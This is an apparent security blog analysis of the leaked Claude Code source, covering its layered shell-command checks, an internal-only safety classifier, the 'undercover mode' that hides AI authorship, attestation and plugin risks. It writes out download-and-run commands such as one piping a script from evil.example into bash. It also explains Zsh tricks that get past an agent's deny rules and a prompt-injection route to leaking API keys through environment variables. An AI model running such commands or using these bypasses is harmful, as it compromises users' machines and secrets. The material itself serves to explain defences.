In March 2026, someone extracted the complete source code of Claude Code from an npm package and published it to GitHub. No modifications. No commentary. Excluding generated code, lock files, and test fixtures — roughly 512,000 lines of TypeScript, dumped into a repository with a single commit.

How this happened is itself a security lesson. Anthropic published version 2.1.88 of their npm package with a production source map file — cli.js.map, weighing in at 59.8 MB — that contained the original TypeScript source, comments and all. A misconfigured .npmignore or a build pipeline that skipped artifact scanning, depending on who you ask. The file was there for anyone to extract. Security researcher Chaofan Shou was the first to notice.
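Why a source map amounts to the source itself: the source map v3 format includes an optional sourcesContent array that carries each original file verbatim. Extracting it is trivial. A minimal TypeScript sketch (structure per the v3 format; the file names are illustrative, not from the leak):

```typescript
// Minimal recovery of original sources from a source map (v3 format).
// When `sourcesContent` is populated, each entry is a source file, verbatim.
interface SourceMapV3 {
  version: number;
  sources: string[];
  sourcesContent?: (string | null)[];
}

function extractSources(map: SourceMapV3): Map<string, string> {
  const recovered = new Map<string, string>();
  map.sources.forEach((path, i) => {
    const content = map.sourcesContent?.[i];
    if (typeof content === "string") recovered.set(path, content);
  });
  return recovered;
}
```

Every modern bundler can be told to omit sourcesContent from production maps; shipping it is what turned a debugging aid into a full disclosure.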

According to multiple reports on Reddit and Hacker News, the source map itself was generated during Claude Code’s build process — a build process that, in all likelihood, was run by Claude. A tool built to hide its own fingerprints in public repositories, exposed by an artifact its own build pipeline created. There’s a meta-irony there that I’ll come back to.

Anthropic didn’t intend for anyone outside their walls to read this code. But it’s publicly available now — published to GitHub, mirrored dozens of times, and discussed on Hacker News, Reddit, and Chinese tech media. No credentials or customer data were exposed. I’m analyzing it as publicly available information, for research and educational purposes, the same way security researchers analyze any leaked codebase. What’s inside tells you more about the state of AI security than any whitepaper or conference talk I’ve seen.

I spent a day reading through this codebase. What I found was not a simple CLI wrapper around an API. It was a security architecture built to solve a problem that most of the industry is still catching up to: what happens when you give a language model shell access?

The Fundamental Problem

Here’s the thing about AI coding assistants. The useful ones don’t just suggest code. They execute it. They run npm install. They edit files. They grep through your codebase. They do the things you’d do yourself in a terminal.

This means the people who build these tools have to solve a security problem that doesn’t have a clean solution. You need to give an AI enough access to be useful, but not so much that it can destroy your machine, exfiltrate your secrets, or silently compromise your build pipeline.

Claude Code approaches this with a level of sophistication that surprised me. And in one critical respect, with a level of caution that should concern everyone who uses it.

Eight Layers of Bash Security

The bash execution path in Claude Code has eight distinct security layers — by my reading of the source. Let that sink in. Eight. For running shell commands.

Here’s what they are, in order:

First, user-defined permission rules. You can say “always allow npm test” or “never allow rm -rf”. Wildcards supported. This is the layer users see and configure.

Second, a classifier — but only if you work at the company. More on this in a moment.

Third, Tree-sitter-based AST analysis. The tool actually parses your bash command into an abstract syntax tree before running it. This isn’t regex matching. It’s structural analysis of the command’s grammar.

Fourth, pattern matching for dangerous constructs. Command substitutions, heredoc injections, process substitutions. The things that make bash a Turing-complete footgun.

Fifth, semantic analysis. Is this command destructive or read-only? The tool tries to figure out what a command does, not just what it says.

Sixth, path validation. Working directory checks. Traversal prevention. Making sure the command runs where you think it does.

Seventh, sandbox isolation. A dedicated sandbox runtime restricts filesystem access and network connections at the syscall level.

Eighth, mode validation. In “plan mode,” everything is read-only. Write operations are blocked entirely.
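To make the layering concrete, here is a deliberately simplified TypeScript sketch of a short-circuiting pipeline in the spirit described above. The individual checks are placeholders standing in for the real layers (the real AST layer uses a parser, not a substring test), but the control flow is the point: any layer can deny, and a command must survive all of them.

```typescript
// Condensed sketch of a layered command-security pipeline.
// Each layer is independent; a deny from any layer short-circuits.
type Verdict = "allow" | "deny" | "pass";
type Layer = (cmd: string) => Verdict;

const layers: Layer[] = [
  (cmd) => (/^rm -rf/.test(cmd) ? "deny" : "pass"),          // 1. user-defined rules
  () => "pass",                                               // 2. classifier (stubbed in public builds)
  (cmd) => (cmd.includes("$(") ? "deny" : "pass"),            // 3-4. AST/pattern checks (simplified)
  (cmd) => (/\b(curl|wget)\b.*\|\s*(ba)?sh/.test(cmd) ? "deny" : "pass"), // 5. semantic heuristic
  // 6-8 (path validation, sandbox, mode checks) omitted from this sketch
];

function evaluate(cmd: string): Verdict {
  for (const layer of layers) {
    const v = layer(cmd);
    if (v !== "pass") return v; // any single layer can block the command
  }
  return "allow";
}
```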

This is defense in depth done seriously. If any one layer fails — and they all can — the others might still catch it. I’ve spent years in application security, and I can tell you that most companies don’t get past layer two.

And then there’s PowerShell.

Claude Code doesn’t just handle bash and zsh. It also has a separate security pipeline for PowerShell — roughly 1,090 lines of dedicated code. The same structural rigor: AST analysis, semantic classification, pattern matching. All of it, replicated for a second shell language. I haven’t seen any other AI coding assistant that even attempts this. Most don’t support PowerShell at all. The ones that do pass commands straight through.

But there’s a problem with this architecture. A big one.

The ANT-ONLY Gap

The second layer I mentioned — the classifier — doesn’t exist in the public version of Claude Code.

Here’s what I mean. The codebase has a file called bashClassifier.ts. In the internal build — the one Anthropic’s own engineers use — this file contains an LLM-based classifier that makes a separate API call to evaluate whether a bash command is safe. It reads the command, understands the user’s intent, and makes a nuanced judgment that no rule-based system can match.

In the public build, that file is a stub. It returns “disabled.” Always.

This works because Claude Code uses Bun’s feature() function for compile-time dead code elimination. When the build system compiles the public version, the real classifier code is simply not included. It’s not obfuscated. It’s not hidden behind a runtime check. It’s gone. The JavaScript runtime never sees it.

The public version ships with rule-based permission checking only. Pattern matching, AST analysis, sandbox — yes. But the thing that would actually understand context? That’s internal only.
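The stub-versus-real pattern is simple to picture. In this sketch the flag name and function signature are my assumptions, not the actual identifiers, and I simulate a public build by hard-coding the flag to false; in the real build, feature() is a compile-time constant and the dead branch is removed from the bundle entirely.

```typescript
// Simulating a public build, where the feature flag evaluates to false
// and the internal branch would be eliminated at compile time.
const feature = (_flag: string): boolean => false;

type ClassifierDecision = "allow" | "deny" | "disabled";

function classifyBashCommand(_command: string): ClassifierDecision {
  if (feature("ANT_ONLY_CLASSIFIER")) {
    // Internal build only: an LLM call would judge the command's intent here.
    return "allow";
  }
  return "disabled"; // public build: the stub always reports "disabled"
}
```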

The effect is an asymmetry worth scrutinizing: Anthropic’s internal users appear to get an additional safety layer that external users do not. The developers who pay for API access — who trust the company’s brand — get a security model that lacks intent-aware evaluation.

Now, the counterargument is strong, and it’s worth laying out fully. Using an LLM to validate an LLM-generated command creates a circular trust problem: you need the model to be safe enough to call the model that makes it safe. There’s also the latency cost of an extra API call on every command, and the financial cost at Anthropic’s scale. These aren’t minor concerns. They’re legitimate engineering tradeoffs.

But the effect remains: Anthropic’s internal users have a security tool that understands intent, while everyone else has one that only understands syntax. That’s a meaningful difference. When someone types curl payload.sh | bash, a rule-based system can flag curl and bash. An intent-aware system can understand that piping a remote script into a shell is almost always a bad idea, regardless of the specific commands involved.

The honest framing is this: Anthropic appears to have decided that the circular trust problem is acceptable internally — where they control the model, the latency budget, and the blast radius — but not acceptable externally, where all three are unknowns. Whether that’s the right call depends on your threat model. But the asymmetry exists, and users should know about it.

Undercover Mode

There’s another internal-only feature that I found particularly revealing. The codebase contains an “undercover mode” — a system designed to prevent Claude Code from leaking internal information when it contributes to public repositories.

When undercover mode is active, the tool injects instructions into its own system prompt: never mention internal model codenames, unreleased version numbers, internal project names, Slack channels, or even the phrase “Claude Code” in commit messages or pull request descriptions.

The blacklist includes things like opus-4-7 and sonnet-4-8 — model versions that, as far as I know, hadn’t been announced publicly at the time of the leak. And animal codenames: Capybara, Tengu. Whether these are real internal model names or placeholders, their presence in the blacklist is itself a data point.

The system has no force-off switch. It defaults to on unless the tool can positively confirm it’s operating in an internal repository. This is gated by the same USER_TYPE flag that controls the classifier gap — ant-only, compiled out of public builds.

I find this fascinating because of the inversion it represents. Most AI coding assistants add attribution. They’ll tell you “this was generated by AI” or include a co-authored-by line. Claude Code does the opposite. It actively tries to hide that an AI was involved at all.

From a security engineering perspective, this makes sense. If you’re using an AI tool on open-source work and you don’t want to signal your toolchain to competitors, undercover mode is exactly what you’d build. But it also raises a question: how many public repositories have commits written by Claude Code that nobody knows were AI-generated?

Dead Code Elimination as a Security Boundary

The mechanism behind the classifier gap is actually one of the most interesting architectural decisions in the codebase.

There are over 90 feature flags — identified by grepping for feature() calls — controlling what gets included in each build. Some are simple toggles — turn on voice mode, turn off telemetry. But others are structural. The COORDINATOR_MODE flag, for example, controls whether the entire multi-agent coordination subsystem is compiled into the binary. Not enabled or disabled at runtime. Compiled in or compiled out.

The code uses feature() from Bun’s bundle module, which works at compile time. If a flag is false, the code inside that branch is eliminated from the output entirely. The resulting JavaScript file literally does not contain those functions.

const coordinatorModule = feature('COORDINATOR_MODE')
  ? require('./coordinator/coordinatorMode.js')
  : null

If COORDINATOR_MODE is false, the bundler sees null and strips the entire require. No dead code. No stub functions. No strings to grep for. Just gone.

This is clever. It means the public build can’t leak internal features through accidental exposure, because the features don’t exist in the public build. You can’t find a hidden flag or a secret API endpoint if the code that implements it was never compiled.

But it’s also a single point of failure. The entire security boundary between internal and external builds rests on the build system correctly evaluating these feature flags. If the build configuration is wrong — if one flag is accidentally flipped — internal code ships to the public.

And there are a lot of flags. Some control features you’d expect: voice mode, web browser tool, enhanced planning. Others are more opaque. TORCH. LODESTONE. BUDDY. Codenames for projects that may never ship publicly.

The feature flag system is doing double duty: it’s both a product management tool and a security boundary. That’s efficient, but it means a product decision can inadvertently affect security, and a security review needs to understand every product flag.

Runtime Attestation

The most extreme expression of this philosophy deserves its own section.

Claude Code implements a NATIVE_CLIENT_ATTESTATION system. When enabled, the tool embeds a placeholder string — cch=00000 — into every API request. Before the request leaves the machine, Bun’s HTTP stack — written in Zig, not JavaScript — overwrites those zeros with a computed cryptographic hash. Same-length replacement, no Content-Length change. The server can then verify that the request genuinely came from an unmodified Claude Code binary.

This isn’t application-level attestation. It’s runtime-level attestation. The thing verifying the client’s identity isn’t the application code — it’s the runtime itself. To my knowledge, no other AI coding assistant does anything like this. It’s the kind of technique you see in DRM systems and anti-cheat software, not developer tools.

The implementation lives in bun-anthropic/src/http/Attestation.zig — Zig code that the JavaScript layer cannot inspect or modify. The attestation token is computed from request-specific data and embedded in the HTTP body, not in a header where it could be stripped.
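The length-preserving substitution is the elegant part: because the computed token occupies exactly the bytes the placeholder did, nothing upstream needs to recompute Content-Length. Here is a TypeScript illustration of that idea only; the hash scheme below is invented for demonstration, and the real computation happens in the Zig layer, out of reach of application code.

```typescript
import { createHash } from "node:crypto";

// Illustrative only: swap a fixed-length placeholder in the request body
// for a same-length token derived from the body, leaving byte count intact.
const PLACEHOLDER = "cch=00000";

function attest(body: string, keyMaterial: string): string {
  const token = createHash("sha256")
    .update(keyMaterial)
    .update(body)
    .digest("hex")
    .slice(0, 5); // five hex chars: same length as the five zeros
  return body.replace(PLACEHOLDER, "cch=" + token);
}
```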

Whether you find this reassuring or unsettling probably depends on how you feel about Anthropic knowing, with high confidence, that you’re using their exact binary and not a fork or wrapper. It’s a defensible choice for a company trying to prevent API abuse. But it also means the tool phones home with a cryptographic proof of its own identity on every request — a capability that, in a different regulatory environment, could become a compliance concern.

The Zsh Problem

One of the things that struck me most was how much effort goes into handling Zsh.

Most people think of “shell security” as a bash problem. You write some regex patterns, you check for dangerous flags on common commands, and you move on. Claude Code does not do that.

There’s extensive handling of Zsh-specific attack surfaces that I doubt most developers even know exist.

Take equals expansion. In Zsh, =curl is equivalent to the full path of the curl binary. This means a deny rule like deny: Bash(curl:*) can be bypassed by writing =curl instead. The tool explicitly blocks this.

Or glob qualifiers. Zsh lets you write things like *(e:'command':) to execute arbitrary code during filename expansion. You can embed command execution inside what looks like a simple file glob. The tool detects and blocks this pattern.

Or Zsh’s module system. zmodload can load modules that provide direct filesystem access (mapfile), network sockets (net/tcp), process spawning (zpty), and more. Each of these is explicitly blocked.

Or Zsh’s always blocks, which guarantee code execution even if the surrounding command fails. Useful for cleanup, terrible for security.

Or Zsh parameter expansion with ~[, which can trigger arbitrary command execution through a mechanism most Zsh users don’t even know about.
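A few of these Zsh-specific hazards can be sketched as checks. The regexes below are my simplifications for illustration; as described above, the real implementation does structural AST analysis rather than pattern matching, precisely because regexes like these are bypassable.

```typescript
// Simplified detectors for some Zsh-specific attack surfaces (illustrative;
// regex checks like these are weaker than the AST analysis described above).
const ZSH_DANGER_PATTERNS: Array<[RegExp, string]> = [
  [/(^|\s)=\w+/, "equals expansion: =cmd resolves to the binary's full path"],
  [/\*\(.*e[:'"]/, "glob qualifier with embedded command execution"],
  [/\bzmodload\b/, "module loading (mapfile, net/tcp, zpty)"],
  [/\balways\b\s*{/, "always block: runs even if the preceding command fails"],
];

function flagZshCommand(cmd: string): string[] {
  return ZSH_DANGER_PATTERNS
    .filter(([pattern]) => pattern.test(cmd))
    .map(([, reason]) => reason);
}
```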

The reason this matters is that shell security is fundamentally harder than people think. Shells are not simple command interpreters. They are programming languages with multiple evaluation stages, implicit behavior, and decades of accumulated features. Zsh is particularly rich in footguns.

When you give an AI shell access, you’re not just giving it the ability to run commands. You’re giving it access to a language with its own Turing-complete capabilities, its own evaluation model, and its own attack surface. Claude Code’s security team clearly understands this. The ~5,200 lines of bash security code — plus the separate Tree-sitter parser at roughly 4,400 lines — reflect that understanding. (Line counts via wc -l on the relevant source directories, excluding tests.)

But here’s the uncomfortable truth: they’re playing whack-a-mole. Every shell feature they block is one they know about. The ones they haven’t found yet are still there.

The Environment Variable Problem

There’s another attack surface that most shell security systems ignore, and Claude Code does not: environment variables.

Here’s the problem. When an AI agent runs a bash command, the shell expands environment variables before execution. If a malicious file contains ${ANTHROPIC_API_KEY}, and that variable exists in the process environment, the shell will happily substitute the actual key value into the command. The agent didn’t ask for the key. The user didn’t type it. But it gets exfiltrated anyway, embedded in whatever command the shell ends up executing.

This isn’t theoretical. It’s a prompt injection vector: trick the AI into running a command that happens to contain an env var reference, and the shell does the rest.

Claude Code addresses this directly. When running in GitHub Actions — an environment where the AI might be processing untrusted repository content — it scrubs over 30 sensitive environment variables from child processes before executing them. API keys. Cloud credentials. OIDC tokens. SSH signing keys. Even GitHub Actions’ own ACTIONS_RUNTIME_TOKEN, which could enable cache poisoning and supply-chain attacks.

The list is explicitly maintained. GITHUB_TOKEN is intentionally not scrubbed, because wrapper scripts need it. Everything else is stripped.
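The scrubbing step itself is simple; the hard part is maintaining the list. A sketch in TypeScript, where the variable names are representative examples drawn from the categories above (the cloud-credential entry is my assumption), not the actual list:

```typescript
// Sketch: strip sensitive variables from a child process environment.
// These names are representative; the real list reportedly covers 30+
// entries, and GITHUB_TOKEN is deliberately left intact.
const SCRUBBED_VARS = [
  "ANTHROPIC_API_KEY",
  "AWS_SECRET_ACCESS_KEY",  // cloud credentials (assumed entry)
  "ACTIONS_RUNTIME_TOKEN",  // GitHub Actions runtime token
];

function scrubbedEnv(
  env: Record<string, string | undefined>
): Record<string, string | undefined> {
  const clean = { ...env };
  for (const name of SCRUBBED_VARS) delete clean[name];
  return clean;
}

// Usage: spawn("bash", ["-c", cmd], { env: scrubbedEnv(process.env) })
```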

Anti-Distillation and the Arms Race

There’s a feature flag in this codebase called ANTI_DISTILLATION_CC.

I want to talk about what that might mean — and be clear about what I can and can’t verify from the source alone.

Distillation, in the ML context, is the practice of using a large model to train a smaller one. You feed the large model inputs, collect its outputs, and use those input-output pairs as training data for a smaller, cheaper model that approximates the large one’s behavior.

From a company’s perspective, this is a problem. If you’ve spent hundreds of millions of dollars training a model, and your users can extract its capabilities by querying it systematically and using the responses to train a competitor, that’s a direct threat to your business.

So companies build defenses. Rate limiting is the obvious one. But there are more subtle approaches: watermarking outputs, perturbing responses in ways that are invisible to humans but poison distillation training, detecting systematic query patterns that suggest extraction attempts.

The ANTI_DISTILLATION_CC flag suggests that Claude Code includes, or is at least intended to include, some of these measures. The _CC suffix indicates it’s specific to this product, not a general platform feature.

But I want to be honest about the limits of what I can determine from static code analysis alone. The presence of this flag tells me Anthropic is concerned about model extraction. It does not, by itself, prove which specific defenses are implemented behind it. The code controlled by this flag could be a single rate-limiting check, a comprehensive output perturbation system, or something in between. Without a running instance and the ability to observe its behavior, I can only speculate about the implementation.

Still, the existence of this flag is revealing in itself. It tells us that one of the leading AI companies considers distillation a sufficiently serious threat to bake defenses directly into their client-side code — not just on the server side. That’s a design choice worth thinking about.

What I find genuinely interesting from a security perspective is the adversarial relationship it represents. The tool is defending, at least in part, against its own users. Not against malicious actors trying to compromise the system, but against legitimate users trying to extract value from it in ways the company doesn’t want.

This is different from traditional security. In traditional security, you have a clear threat model: attackers, malware, unauthorized access. The defense is aligned with the user’s interests. Here, the defense is aligned with the company’s interests, and potentially opposed to the user’s interests.

I’m not making a normative claim about whether this is right or wrong. Companies protect their intellectual property. That’s normal. But it’s worth recognizing that “anti-distillation” features exist in a gray area between security, DRM, and competitive moat-building. And the technical approaches — output perturbation, behavioral detection — are essentially the same techniques used in adversarial ML.

Whether or not the specific defenses behind this flag are aggressive or minimal, the fact that the flag exists tells us something about where the industry is heading. The arms race here will be fascinating to watch.

Plugins: The Eternal Tension

The plugin system comprises roughly 50 files — more than the bash security layer.

There’s a marketplace manager that supports URL-based, GitHub-based, and local marketplaces. A dependency resolver. Automatic updates. A security blocklist. Organization-level plugin policies. OAuth-based plugin authentication.

This is a fully-fledged extension platform. And it represents the oldest tension in software security: extensibility versus control.

Plugins, by definition, run code that the core team didn’t write and can’t fully vet. A plugin can define custom slash commands, custom agents, custom hooks, and MCP servers. It can modify the tool’s behavior in ways the core security model doesn’t account for.

Claude Code has mitigations. There’s a blocklist. There’s a flagging system. There’s organization policy control. But the fundamental problem remains: if you let users install arbitrary code, they will install arbitrary code. Some of it will be malicious. Some of it will be incompetent. The security model can make this harder, but it can’t make it impossible.

What makes this particularly relevant for AI coding assistants is the asymmetry of trust. When you install a VS Code extension, you’re trusting the extension with your editor. When you install a plugin for an AI coding assistant, you’re trusting it with an agent that has shell access, file system access, and the ability to make API calls on your behalf.

The blast radius is different.

I noticed that the plugin system has a concept of “inline plugins” — plugins defined directly in configuration rather than installed from a marketplace. This is convenient for developers. It’s also a convenient way to inject malicious behavior without going through any review process.

How Others Handle This

To put all of this in context, I looked at how the three most prominent open-source AI coding assistants approach the same fundamental problem. Codebases examined on March 31, 2026 — these tools update frequently, so specifics may have changed since.

Aider takes the minimalist path. Commands go through Python’s subprocess.Popen with shell=True. No permission system. No sandbox. No AST analysis. The entire security model is: the user approves each command, and hopefully the user knows what they’re approving. For a research project or personal tool, this is fine. For anything touching production infrastructure, it isn’t.

Cline adds a permission layer. It asks the user before executing commands and maintains a simple allowlist. But the permission check is string-based — it matches command text, not intent. There’s no structural analysis of what the command actually does. A carefully crafted command can look benign to a string matcher while doing something entirely different.
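A toy example shows the weakness. The prefix-allowlist behavior below is my simplification for illustration, not Cline’s actual code, but it captures the failure mode: text matching approves the whole line, while an AST-based checker would split it into separate commands and evaluate each.

```typescript
// A naive prefix allowlist: anything starting with an approved command passes.
const ALLOWLIST = ["npm test", "git status"];

function allowedByPrefix(cmd: string): boolean {
  return ALLOWLIST.some((ok) => cmd.startsWith(ok));
}

// "npm test && curl https://evil.example/p.sh | bash" starts with "npm test",
// so a prefix matcher approves the entire line. A structural checker would
// see three commands joined by && and |, and evaluate each one separately.
```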

opencode goes further with a banned command list — specific commands and flags that are blocked entirely. But it’s still pattern matching. A cleverly constructed command can bypass any fixed list of banned strings.

None of them have compile-time security boundaries. None of them scrub environment variables from subprocesses. None of them parse shell commands into abstract syntax trees. None of them have anti-distillation features. None of them try to hide their own involvement in public repositories.

This isn’t a criticism. These are open-source projects built by small teams, and they’ve made reasonable tradeoffs for their context. But the gap between what they do and what Claude Code does illustrates something important: the security engineering required to give an AI shell access at production scale is enormous. Most teams aren’t doing it.

What Builders Can Learn

If you’re building an AI agent system — whether it’s a coding assistant, a data pipeline, or anything else that executes actions on behalf of users — here’s what this codebase teaches.

Layer your defenses, and make them independent. The eight-layer bash security model works because each layer uses a different approach. AST parsing catches things that pattern matching misses. Sandbox isolation catches things that semantic analysis misses. When layers are independent, one failure doesn’t cascade.

Understand your execution environment deeply. The Zsh handling shows what happens when security engineers really understand the environment they’re securing. Shells aren’t simple. Browsers aren’t simple. File systems aren’t simple. If you’re giving an agent access to any of these, you need engineers who understand the attack surface at a deep level, not just a surface level.

Compile-time elimination is stronger than runtime hiding — when it fits your threat model. The feature flag approach — actually removing code from the build rather than hiding it behind a runtime check — is harder to bypass. You can’t reverse-engineer what isn’t there. If you have features that should never be accessible to certain users, don’t ship them and check a flag. Don’t ship them at all. This isn’t universally applicable — runtime controls still have their place — but for secrets you genuinely never want exposed, compile-time elimination is the stronger choice.

Beware the internal-external gap. If your internal users get different security than your external users, you need to be honest about that — and have a plan to close the gap. The rule-based system in Claude Code is good. But Anthropic’s choice to use an LLM-based classifier internally suggests they consider intent-aware checking valuable — or at least acceptable within the latency, cost, and risk parameters of an internal deployment. It’s a tradeoff they’ve apparently resolved differently for external users.

Plugins are the hard problem. Every platform that allows extensions eventually faces this. The more powerful your agent, the more dangerous a malicious plugin becomes. Have a threat model for plugins before you ship a plugin system. Not after.

Task IDs need to be unguessable. This seems minor, but it’s one of my favorite details in the codebase. The IDs use 8 random bytes from a cryptographic random number generator, mapped to a 36-character alphabet, giving roughly 2.8 trillion possible IDs. The comment in the code says this is “sufficient to resist brute-force symlink attacks.” That’s the right way to think about it. Every identifier that an attacker could influence is a potential attack vector.
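A sketch of that scheme, with the caveat that the exact byte-to-character mapping is my assumption (a strictly uniform mapping would use rejection sampling rather than modulo, but the bias here is negligible for this purpose):

```typescript
import { randomBytes } from "node:crypto";

// Eight CSPRNG bytes, each mapped to one of 36 characters:
// 36^8 ≈ 2.8 trillion possible IDs.
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";

function taskId(): string {
  const bytes = randomBytes(8);
  let id = "";
  for (let i = 0; i < bytes.length; i++) {
    id += ALPHABET[bytes[i] % ALPHABET.length]; // slight modulo bias, acceptable here
  }
  return id;
}
```

The contrast worth internalizing: Math.random() would produce IDs of the same shape, but from a predictable generator. Only the cryptographic source makes the “resist brute-force” claim meaningful.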

Sandbox, but don’t trust your sandbox. Claude Code has a dedicated sandbox runtime. It also has seven other security layers. That’s the right instinct. Sandboxes are strong defenses, but they have bugs. Escape vulnerabilities get discovered. Layer your defenses so that a sandbox escape doesn’t mean total compromise.

The Bigger Picture

What this codebase really shows is how early we are in the AI security journey.

Roughly 512,000 lines of code to build a CLI tool that helps developers write code. Eight layers of bash security. A separate PowerShell pipeline. A runtime-level attestation system embedded in Zig. An undercover mode that hides its own fingerprints from public repositories. Over 90 feature flags to manage the complexity. Environment variable scrubbing for 30+ secrets. Around 50 files of plugin infrastructure.

This is an enormous amount of engineering dedicated to a problem that, two years ago, barely existed. And it’s still not enough. The classifier gap suggests Anthropic knows their public security model is weaker than it could be. The Zsh handling reveals that shell security is an ongoing cat-and-mouse game. The anti-distillation flag points to an adversarial dynamic between AI companies and their users that is real and growing. The undercover mode suggests they’re worried about signaling — about what happens when the world finds out how much AI-generated code is already in production.

And then there’s the leak itself. A tool with an undercover mode designed to prevent fingerprint exposure in public repositories, whose build pipeline — reportedly powered by the same AI — generated a 59.8 MB source map that exposed the entire codebase. If even Anthropic, with the most sophisticated agent security architecture I’ve seen, can be undone by a misconfigured build artifact, what does “good enough” look like for everyone else?

I looked at the open-source alternatives. Aider doesn’t sandbox. Cline doesn’t parse. opencode doesn’t scrub. The gap isn’t about talent or intention — it’s about the sheer volume of defensive engineering required when you give a language model shell access and decide to take the threat seriously.

We’re building systems that have more agency than any software we’ve ever deployed. They can read files, write files, execute commands, make network requests, install packages, and spawn subprocesses. They do this in service of goals that are expressed in natural language — goals that are inherently ambiguous and open to manipulation.

The security challenge isn’t preventing unauthorized access. It’s defining what authorized access means when the authorized user is a language model interpreting a human’s intent.

I don’t think anyone has solved this yet. Claude Code represents one of the most serious attempts I’ve seen. It’s thoughtful, layered, and built by people who clearly understand both the power and the danger of what they’re building.

But the internal-external gap remains. The whack-a-mole continues. The arms race is just getting started. And the question that nobody has answered yet is: if the company taking agent security most seriously still ships a weaker model to its paying customers than to its own engineers — what is the baseline we should expect from everyone else?